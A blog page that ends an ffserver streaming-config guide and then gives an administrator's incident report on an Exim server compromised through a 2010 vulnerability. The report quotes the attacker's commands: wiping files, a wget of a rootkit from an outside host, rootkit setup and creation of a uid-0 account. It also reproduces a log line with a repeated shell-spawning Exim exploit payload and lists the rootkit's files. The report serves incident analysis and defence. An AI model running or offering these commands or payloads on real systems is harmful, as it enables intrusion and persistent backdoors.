     # Alternative video codecs:
     # VideoCodec h263p
     # VideoCodec h263
     # VideoCodec libxvid
     # VideoQMin 10
     # VideoQMax 31
     VideoCodec libx264
     AVOptionVideo me_range 16
     AVOptionVideo i_qfactor .71
     AVOptionVideo qmin 30
     AVOptionVideo qmax 51
     AVOptionVideo qdiff 4
     # AVOptionVideo coder 0
     # AVOptionVideo flags +loop
     # AVOptionVideo cmp +chroma
     # AVOptionVideo partitions +parti8x8+parti4x4+partp8x8+partb8x8
     # AVOptionVideo me_method hex
     # AVOptionVideo subq 7
     # AVOptionVideo g 50
     # AVOptionVideo keyint_min 5
     # AVOptionVideo sc_threshold 0
     # AVOptionVideo b_strategy 1
     # AVOptionVideo qcomp 0.6
     # AVOptionVideo bf 3
     # AVOptionVideo refs 3
     # AVOptionVideo directpred 1
     # AVOptionVideo trellis 1
     # AVOptionVideo flags2 +mixed_refs+wpred+dct8x8+fastpskip
     # AVOptionVideo wpredp 2
     ## AVOptionVideo flags +global_header+loop
     # NoAudio
     AudioCodec libmp3lame
     AudioBitRate 32
     AudioChannels 1
     AudioSampleRate 24000
     ## AVOptionAudio flags +global_header
     </Stream>
  • Setting a FLV stream ouput:
     ################################################################################
     # FLV output - good for streaming
     <Stream test.flv>
     # the source feed
     Feed feed1.ffm
     # the output stream format - FLV = FLash Video
     Format flv
     VideoCodec flv
     # this must match the ffmpeg -r argument
     VideoFrameRate 15
     # generally leave this is a large number
     VideoBufferSize 80000
     # another quality tweak
     VideoBitRate 200
     # quality ranges - 1-31 (1 = best, 31 = worst)
     VideoQMin 1
     VideoQMax 5
     VideoSize 352x288
     # this sets how many seconds in past to start
     PreRoll 0
     # wecams don't have audio
     Noaudio
     </Stream>
  • Setting a ASF stream ouput:
     ################################################################################
     # ASF output - for windows media player
     <Stream test.asf>
     # the source feed
     Feed feed1.ffm
     # the output stream format - ASF
     Format asf
     VideoCodec msmpeg4
     # this must match the ffmpeg -r argument
     VideoFrameRate 15
     # transmit only intra frames (useful for low bitrates, but kills frame rate).
     # VideoIntraOnly
     # if non-intra only, an intra frame is transmitted every VideoGopSize
     # frames. Video synchronization can only begin at an intra frame.
     VideoGopSize 40
     # generally leave this is a large number
     VideoBufferSize 1000
     # another quality tweak
     VideoBitRate 200
     # quality ranges - 1-31 (1 = best, 31 = worst)
     VideoQMin 1
     VideoQMax 15
     VideoSize 352x288
     # this sets how many seconds in past to start
     PreRoll 0
     # generally, webcams don't have audio
     # Noaudio
     AudioCodec libmp3lame
     AudioBitRate 32
     AudioChannels 1
     AudioSampleRate 24000
     </Stream>
  • Other streams availables:
     # Multipart JPEG
     #<Stream test.mjpg>
     #Feed feed1.ffm
     #Format mpjpeg
     #VideoFrameRate 2
     #VideoIntraOnly
     #NoAudio
     #Strict -1
     #</Stream>
     # Single JPEG
     #<Stream test.jpg>
     #Feed feed1.ffm
     #Format jpeg
     #VideoFrameRate 2
     #VideoIntraOnly
     ##VideoSize 352x240
     #NoAudio
     #Strict -1
     #</Stream>
     # Flash
     #<Stream test.swf>
     #Feed feed1.ffm
     #Format swf
     #VideoFrameRate 2
     #VideoIntraOnly
     #NoAudio
     #</Stream>
     # MP3 audio
     #<Stream test.mp3>
     #Feed feed1.ffm
     #Format mp2
     #AudioCodec mp3
     #AudioBitRate 64
     #AudioChannels 1
     #AudioSampleRate 44100
     #NoVideo
     #</Stream>
     # Ogg Vorbis audio
     #<Stream test.ogg>
     #Feed feed1.ffm
     #Title "Stream title"
     #AudioBitRate 64
     #AudioChannels 2
     #AudioSampleRate 44100
     #NoVideo
     #</Stream>
     # Real with audio only at 32 kbits
     #<Stream test.ra>
     #Feed feed1.ffm
     #Format rm
     #AudioBitRate 32
     #NoVideo
     #NoAudio
     #</Stream>
     # Real with audio and video at 64 kbits
     #<Stream test.rm>
     #Feed feed1.ffm
     #Format rm
     #AudioBitRate 32
     #VideoBitRate 128
     #VideoFrameRate 25
     #VideoGopSize 25
     #NoAudio
     #</Stream>
  • Other special streams:
     # Server status
     <Stream stat.html>
     Format status
     # Only allow local people to get the status
     ACL allow localhost
     ACL allow 192.168.0.0 192.168.255.255
     #FaviconURL http://pond1.gladstonefamily.net:8080/favicon.ico
     </Stream>
    
     # Redirect index.html to the appropriate site
     <Redirect index.html>
     URL http://www.ffmpeg.org/
     </Redirect>

Extra references:

My Exim is under attack!!

Exim logotipe

A few days ago, I received one alarm from one mail list server under my management. /etc/password
file had been modified. In fact, my system had been broke down and somebody was modifying
my server at will. Fortunetly, I often configure my monitor system to check
md5
variations in important files of the system.
Quickly, I logged on the host and, shaw the next commands executed as
root on my server:

 id
pwd
cd ..
cd ..
ls
rm -rf *
ls
wget \freewebtown.com/zaxback/rk.tar
tar xzvf rk.tar
cd shv5
./setup 54472Nx79904 9292
ls
pwd
ls
/usr/sbin/useradd -u 0 -g 0 -o mt
passwd mt

The hacker had installed something on my server and I had to discover what! …

The downloaded package, rk.tar (http://freewebtown.com/zaxback/rk.tar) contained a
the badware trojan called shv5. This mainly was a backdoor and a suite of fake
system libraries and binaries changed maliciously.

The first task in the TODO list was check if somebody else was conected yet
in the system and, at least review review the auth.log to known to IP which
was the ofrigin of the attack.

Once detected the hacker’s IP and confirmed my suspicion about the origin of the
attack: a windows infected host (a zombie), I decided that
follow the tracks of the hacker was time to lose, so I began to check
the scope of intrusion.

Reviewing the rk.tar package and the setup.sh script I got to make a list
of posible infected files on my server:

/sbin/xlogin
/bin/login
/etc/sh.conf
/bin/.bash_history
/lib/lidps1.so
/usr/include/hosts.h
/usr/include/file.h
/usr/include/log.h
/usr/include/proc.h
/lib/libsh.so
/lib/libsh.so/*
/usr/lib/libsh
/usr/lib/libsh/*
/sbin/ttyload
/usr/sbin/ttyload
/sbin/ttymon
/etc/inittab
/usr/bin/ps
/bin/ps
/sbin/ifconfig
/usr/sbin/netstat
/bin/netstat
/usr/bin/top
/usr/bin/slocate
/bin/ls
/usr/bin/find
/usr/bin/dir
/usr/sbin/lsof
/usr/bin/pstree
/usr/bin/md5sum
/sbin/syslogd
/etc/ttyhash
/lib/ldd.so
/lib/ldd.so/*
/usr/src/.puta
/usr/src/.puta/*
/usr/sbin/xntpd
/usr/sbin/nscd
/usr/info/termcap.info-5.gz
/usr/include/audit.h
/usr/include/bex
/usr/include/bex/*
/var/log/tcp.log
/usr/bin/sshd2
/usr/bin/xsf
/usr/bin/xchk
/dev/tux
/usr/bin/ssh2d
/lib/security/.config/
/lib/security/.config/*
/etc/ld.so.hash
/etc/rc.d/rc.sysinit
/etc/inetd.conf

I noted that many importat commands of the system has been changed for others
non-safe commands. The reason was obviously: Hide the Troyan!. Also, the
badware had modified attributes of infected files to avoid modifications
(chattr +isa /usr/sbin/netstat, for example).

Inmediatly, I decided the reinstallation of the main binaries and libraries
of the system:

apt-get install --reinstall net-tools coreutils

After recover safe versions of commands like netstat, md5sum, ls or similars,
I began to see what was really happen on the system:

  • A keylogger was up on the system:
    root      7469  0.0  0.0   1804   652 ?        S    14:55   0:00 ttymon tymon
    
    tcp        0      0 0.0.0.0:9292            0.0.0.0:* LISTEN     7467/ttyload
  • A hide HTTP/FTP server was running:
    103       7671  0.1  0.1   4936  2968 ?        S    14:58   0:18  syslogr
    root     10886  0.0  0.0  11252  1200 ?        Sl   17:39   0:00 /usr/sbin/httpd
    
    tcp        0      0 0.0.0.0:64842           0.0.0.0:* LISTEN     7424/httpd

syslogr process wasn’t nothing related to the syslog system. It was a process
which launched the hide HTTP/FTP service to share files … files of the infected server.
I addition, syslogr proccess was relaunched by a root cronjob to keep up
this proccess on the system.

# crontab  -l
* * * * * /.../bin/cron.sh >/dev/null 2>&1

More things!, as you can observe in the cron job, somebody was created a hide
directory under / directory: /... . This directory contained the httpd
binaries and conffiles and directories used by the httpd process.

After sometime working on the server, I’d done the follow actions in order
to revoke all the security breaks detected:

  • I’d reinstalled all the binaries and libraries posible non-safe after the atack.
  • I’d erased bad process on the system aka syslogr, ttymon … and cronjobs or others
    ways to keep up these.
  • I’d deleted the user mt with the uid=0
  • I’d reviewed the SSH access to the server on the main firewall

6 coffees later, I reached one diagnostic more detailled about what was happen
… and there wasn’t good news 😦

On December 16, the server had been hacked through a vulnerability discovered
on the Exim4 service and reported on Debian Security Reports on December 10:

http://www.debian.org/security/2010/dsa-2131

This vulnerability allowed remote execution of arbitrary code and a privilege
escalation. This allowed to the attacker to inject public keys for the root
user.

2010-12-16 20:47:25 1PTJj8-0006K2-Ck rejected from  H=trbearcom.com.au (yahoo.com) [131.103.65.196]: message too big: read=52518119 max=52428800
2010-12-16 20:48:25 H=trbearcom.com.au (yahoo.com) [131.103.65.196] temporarily rejected MAIL webmaster@yahoo.com: failed to expand ACL string "/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/b
in/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh
-i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run
{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin
/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${
run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /
bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}}
${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exe
c /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&
0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c '
exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0
2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -
c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/s
h -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i
&0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bi
n/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh
-i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{
/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/
sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${
run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /b
in/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}
} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec
/bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${run{/bin/sh -c 'exec /bin/sh -i &0 2>&0'}} ${r
2010-12-16 20:49:06 1PTJp4-0006Kx-E5  sistemas-srv  R=mailman_router T=mailman_transport

The attack could have been controlled at this point but missed two
things:

  1. Monitorization root authorized keys file it could not see
    the changes due it didn’t have permission to access it so the monitor
    didn’t report anything.
  2. At sometime, the SSH restriction access was removed.

These facts allowed that the attack continues hidden until Janury 9. I lose!!!

As a summary, the timing of the attack is as follows:

  • December 10, Exim vulnerability discovered an published

    NM/09 Bugzilla 787: Potential buffer overflow in string_format Patch provided by Eugene Bujak

  • December 16, a large-scale attack is performed using this vulnerability where my host is break down from trbearcom.com.au (yahoo.com) [131.103.65.196]. In this attack it’ll incorporate public key of the attacker root
  • December 26, the attacker inserts a Trojan into my host
  • January 9, the attacker inserts a keylogger and attempts to hide editing system tools. During this attack, my monitors notified the /etc/password file is changed

Finally, I knew how to the attacker had break down my server and things which I’d to fix, so I ‘d make the following actions in order to restore the security of may server:

  • Updated the system to lenny:
    1. Edit the /etc/apt/sources.list file fixing the repositories to lenny
    2. sudo aptitude update
    3. sudo aptitude install apt dpkg aptitude
    4. sudo aptitude full-upgrade

More references: